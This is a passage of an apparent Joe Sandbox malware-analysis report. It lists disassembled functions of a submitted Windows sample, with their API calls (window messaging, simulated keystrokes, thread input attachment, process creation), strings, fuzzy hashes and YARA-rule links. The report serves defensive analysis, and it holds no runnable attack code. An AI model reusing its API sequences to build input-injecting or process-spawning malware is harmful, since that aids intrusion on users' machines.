                                                            • Instruction Fuzzy Hash: 12310635A10305AFDB21EF64CC8AABEB7B4FF55700F108129E902DB2E2DB719952C751
                                                            Function 001F9471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                              • Part of subcall function 001FB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001FB0E7
                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 001F94F6
                                                            • GetDlgCtrlID.USER32 ref: 001F9501
                                                            • GetParent.USER32 ref: 001F951D
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 001F9520
                                                            • GetDlgCtrlID.USER32(?), ref: 001F9529
                                                            • GetParent.USER32(?), ref: 001F9545
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 001F9548
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1536045017-1403004172
                                                            • Opcode ID: adcd3f1e79a901305ebb9bbb6283802a134c2ea372b0703cf9010a21dc3d6242
                                                            • Instruction ID: 448365bb4e0eb9f5c8fc31648f013e300a072b9bd5acbffcf538a88963c85876
                                                            • Opcode Fuzzy Hash: adcd3f1e79a901305ebb9bbb6283802a134c2ea372b0703cf9010a21dc3d6242
                                                            • Instruction Fuzzy Hash: 3A21C474A04208BBCF05ABA4CC85EFEBB79EF95300F500125BA61972E2DB755919DB20
                                                            Function 001F955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                              • Part of subcall function 001FB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001FB0E7
                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 001F95DF
                                                            • GetDlgCtrlID.USER32 ref: 001F95EA
                                                            • GetParent.USER32 ref: 001F9606
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 001F9609
                                                            • GetDlgCtrlID.USER32(?), ref: 001F9612
                                                            • GetParent.USER32(?), ref: 001F962E
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 001F9631
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1536045017-1403004172
                                                            • Opcode ID: 0eea5116287419ef0045e10ad3ef0f11e56f3eba3a5aead145082f3a7cc4a189
                                                            • Instruction ID: 5731f50935b33a6487b8e14d30ea47c874d257b63eb8380da99e0f739e2d8053
                                                            • Opcode Fuzzy Hash: 0eea5116287419ef0045e10ad3ef0f11e56f3eba3a5aead145082f3a7cc4a189
                                                            • Instruction Fuzzy Hash: 7221C574A00208BBDF15ABA0CCC5EFEBB79EF59300F500126FA61972A1DB759919DB20
                                                            Function 001F9645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32 ref: 001F9651
                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 001F9666
                                                            • _wcscmp.LIBCMT ref: 001F9678
                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 001F96F3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                            • API String ID: 1704125052-3381328864
                                                            • Opcode ID: c225e224a8a88a26a667825037d68907dd6320a36425961fa3b452f71e5aa9d4
                                                            • Instruction ID: 50992c98c8f3eaa5a5ed156536bb859edb98e26ccac089cccfd15f264a381c58
                                                            • Opcode Fuzzy Hash: c225e224a8a88a26a667825037d68907dd6320a36425961fa3b452f71e5aa9d4
                                                            • Instruction Fuzzy Hash: 8811CA7A25830BBAF6153620EC0AFB6779CDB25771F20012AFF10E50D1FF61A965495C
                                                            Function 00204189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __swprintf.LIBCMT ref: 0020419D
                                                            • __swprintf.LIBCMT ref: 002041AA
                                                              • Part of subcall function 001C38D8: __woutput_l.LIBCMT ref: 001C3931
                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 002041D4
                                                            • LoadResource.KERNEL32(?,00000000), ref: 002041E0
                                                            • LockResource.KERNEL32(00000000), ref: 002041ED
                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 0020420D
                                                            • LoadResource.KERNEL32(?,00000000), ref: 0020421F
                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0020422E
                                                            • LockResource.KERNEL32(?), ref: 0020423A
                                                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0020429B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                            • String ID:
                                                            • API String ID: 1433390588-0
                                                            • Opcode ID: 4dce8d056a84fe04fe531c7d4320e0a97bc3ec382dfffa86a70cc1bbe054c84e
                                                            • Instruction ID: a1a380b7875e208621c4ac89c6620a4817f628de137d4dfc524cada53e6b81bc
                                                            • Opcode Fuzzy Hash: 4dce8d056a84fe04fe531c7d4320e0a97bc3ec382dfffa86a70cc1bbe054c84e
                                                            • Instruction Fuzzy Hash: 8531A0B161520ABFDB11AFA0ED48EBB7BBCEF15301F008525FE15D6191D770DA628BA0
                                                            Function 002016DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00201700
                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00200778,?,00000001), ref: 00201714
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0020171B
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00200778,?,00000001), ref: 0020172A
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0020173C
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00200778,?,00000001), ref: 00201755
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00200778,?,00000001), ref: 00201767
                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00200778,?,00000001), ref: 002017AC
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00200778,?,00000001), ref: 002017C1
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00200778,?,00000001), ref: 002017CC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                            • String ID:
                                                            • API String ID: 2156557900-0
                                                            • Opcode ID: 649da43740c28651e2ecad4871c9d816c1827ca3e7588d24fa14106b9627bada
                                                            • Instruction ID: 53ceaedcf2b335b6bc5e7fdf1a72f9f919ccfb34cfa14de8f5a48e48e6875b46
                                                            • Opcode Fuzzy Hash: 649da43740c28651e2ecad4871c9d816c1827ca3e7588d24fa14106b9627bada
                                                            • Instruction Fuzzy Hash: 4231A975610305BBEB219F64FE8CF79BBB9EB25715F108028F804866F1D7B49D608B60
                                                            Function 00219428 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$_memset
                                                            • String ID: ,,#$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                            • API String ID: 2862541840-1875468495
                                                            • Opcode ID: 3f96b5d094ffea76040e60492cfc51fa8957be7b66067f7501656cdf2062e72b
                                                            • Instruction ID: b1fc696f84178ab83d04f0bb928c5447a8770102d3e286070cf1f074eaf629d4
                                                            • Opcode Fuzzy Hash: 3f96b5d094ffea76040e60492cfc51fa8957be7b66067f7501656cdf2062e72b
                                                            • Instruction Fuzzy Hash: 8C91CE70A20219ABDF20DFA5C858FEEB7F8EF65310F108159F515AB280D7B09995CFA0
                                                            Function 001FA693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnumChildWindows.USER32(?,001FAA64), ref: 001FA9A2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ChildEnumWindows
                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                            • API String ID: 3555792229-1603158881
                                                            • Opcode ID: c07334e23f4666508b94f9f481724bad08562f4f445551ec84ae0eed50213e7c
                                                            • Instruction ID: 1d40c93fec1baf6dddccf853af5f6139285cf35fe95502a82b3c396ec98d73bb
                                                            • Opcode Fuzzy Hash: c07334e23f4666508b94f9f481724bad08562f4f445551ec84ae0eed50213e7c
                                                            • Instruction Fuzzy Hash: 8291C9B050020ADBDB08DFA0C481FF9FB75BF14354F908129DA9EA7151DF74AA99CB91
                                                            Function 001A2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowLongW.USER32(?,000000EB), ref: 001A2EAE
                                                              • Part of subcall function 001A1DB3: GetClientRect.USER32(?,?), ref: 001A1DDC
                                                              • Part of subcall function 001A1DB3: GetWindowRect.USER32(?,?), ref: 001A1E1D
                                                              • Part of subcall function 001A1DB3: ScreenToClient.USER32(?,?), ref: 001A1E45
                                                            • GetDC.USER32 ref: 001DCF82
                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 001DCF95
                                                            • SelectObject.GDI32(00000000,00000000), ref: 001DCFA3
                                                            • SelectObject.GDI32(00000000,00000000), ref: 001DCFB8
                                                            • ReleaseDC.USER32(?,00000000), ref: 001DCFC0
                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001DD04B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                            • String ID: U
                                                            • API String ID: 4009187628-3372436214
                                                            • Opcode ID: 0ba88fc1bf041cf5a5c88f5a685fee3ad34013b4653f93bcde731ab616444fee
                                                            • Instruction ID: 02a2ffdfeffd7bc8bae2e8576081002b1b039246c4ff1f582093ebd165fd3f7e
                                                            • Opcode Fuzzy Hash: 0ba88fc1bf041cf5a5c88f5a685fee3ad34013b4653f93bcde731ab616444fee
                                                            • Instruction Fuzzy Hash: 2E71F735500205EFCF258F68D884AFA7BB5FF49310F14466AFD559A266C7318C92DFA0
                                                            Function 00218F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0022F910), ref: 0021903D
                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0022F910), ref: 00219071
                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 002191EB
                                                            • SysFreeString.OLEAUT32(?), ref: 00219215
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                            • String ID:
                                                            • API String ID: 560350794-0
                                                            • Opcode ID: 37ef30c92331443203ca7ac7e392ba765013468e987115ad217f4cba23f207ff
                                                            • Instruction ID: f26da150918d09dffce0a01244c28f975b670df64cea4b55866e6603070c2dea
                                                            • Opcode Fuzzy Hash: 37ef30c92331443203ca7ac7e392ba765013468e987115ad217f4cba23f207ff
                                                            • Instruction Fuzzy Hash: A0F14A31A1010AEFCB14DF94C898EEEB7B9FF59314F108098F915AB250CB71AE96CB50
                                                            Function 0021F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 0021F9C9
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0021FB5C
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0021FB80
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0021FBC0
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0021FBE2
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0021FD5E
                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0021FD90
                                                            • CloseHandle.KERNEL32(?), ref: 0021FDBF
                                                            • CloseHandle.KERNEL32(?), ref: 0021FE36
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                            • String ID:
                                                            • API String ID: 4090791747-0
                                                            • Opcode ID: 147aa02ce7a47d90657f59f2e07258f602276eb1473ac6a78ca9facebb20f098
                                                            • Instruction ID: 7a7f864e356605bd70bfc13963d97324462e9d82215b4769dec7ccdb9efe81b8
                                                            • Opcode Fuzzy Hash: 147aa02ce7a47d90657f59f2e07258f602276eb1473ac6a78ca9facebb20f098
                                                            • Instruction Fuzzy Hash: 3EE1C531214341DFC754EF24C991BABBBE0AF95314F14886DF8999B2A2DB31DC91CB52
                                                            Function 00204F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 002048AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002038D3,?), ref: 002048C7
                                                              • Part of subcall function 002048AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002038D3,?), ref: 002048E0
                                                              • Part of subcall function 00204CD3: GetFileAttributesW.KERNEL32(?,00203947), ref: 00204CD4
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00204FE2
                                                            • _wcscmp.LIBCMT ref: 00204FFC
                                                            • MoveFileW.KERNEL32(?,?), ref: 00205017
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                            • String ID:
                                                            • API String ID: 793581249-0
                                                            • Opcode ID: edcceb0c0fda6984eebccad5c32f8723a4d68f9dcd879ca3af9439a14f4bd6ae
                                                            • Instruction ID: 4ad6c75ab21fb1115b0602f91cf0e57ec233c31c71f63e9343ccaf143f9214f4
                                                            • Opcode Fuzzy Hash: edcceb0c0fda6984eebccad5c32f8723a4d68f9dcd879ca3af9439a14f4bd6ae
                                                            • Instruction Fuzzy Hash: 025165B20187855BC724EB50DC819DFB7ECAF95300F00492EF289D3192EF74A6988B66
                                                            Function 002288B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0022896E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            • Opcode ID: 6ee86bc1c1609625d5a55ff14cad05494c838f0da342d3bd8338771d9d8937ab
                                                            • Instruction ID: 88c303fe31a0dd45bfcbede9945c6fe7609cb4b4cc0717ff21f107524d61a956
                                                            • Opcode Fuzzy Hash: 6ee86bc1c1609625d5a55ff14cad05494c838f0da342d3bd8338771d9d8937ab
                                                            • Instruction Fuzzy Hash: 1151DB30521229BFDF309FA8EC89BA97B65FF15310F504122F511E66A1DFB1E9A0DB41
                                                            Function 001A2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 001DC547
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 001DC569
                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001DC581
                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 001DC59F
                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001DC5C0
                                                            • DestroyIcon.USER32(00000000), ref: 001DC5CF
                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 001DC5EC
                                                            • DestroyIcon.USER32(?), ref: 001DC5FB
                                                              • Part of subcall function 0022A71E: DeleteObject.GDI32(00000000), ref: 0022A757
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                            • String ID:
                                                            • API String ID: 2819616528-0
                                                            • Opcode ID: 22d7c9234b1d5dd60baafbacb026d46297db2920ae2524292be26f35d0589ea4
                                                            • Instruction ID: 082f748d346a386383bbc24292adb8e932eaef813d23156997ee766d8bb083a8
                                                            • Opcode Fuzzy Hash: 22d7c9234b1d5dd60baafbacb026d46297db2920ae2524292be26f35d0589ea4
                                                            • Instruction Fuzzy Hash: DF515F74A00206EFDB24DF68EC49FAA77B5EB55320F104529F912D72A0D7B0ED91DBA0
                                                            Function 001F9B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001FAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 001FAE77
                                                              • Part of subcall function 001FAE57: GetCurrentThreadId.KERNEL32 ref: 001FAE7E
                                                              • Part of subcall function 001FAE57: AttachThreadInput.USER32(00000000,?,001F9B65,?,00000001), ref: 001FAE85
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 001F9B70
                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001F9B8D
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 001F9B90
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 001F9B99
                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 001F9BB7
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 001F9BBA
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 001F9BC3
                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 001F9BDA
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 001F9BDD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
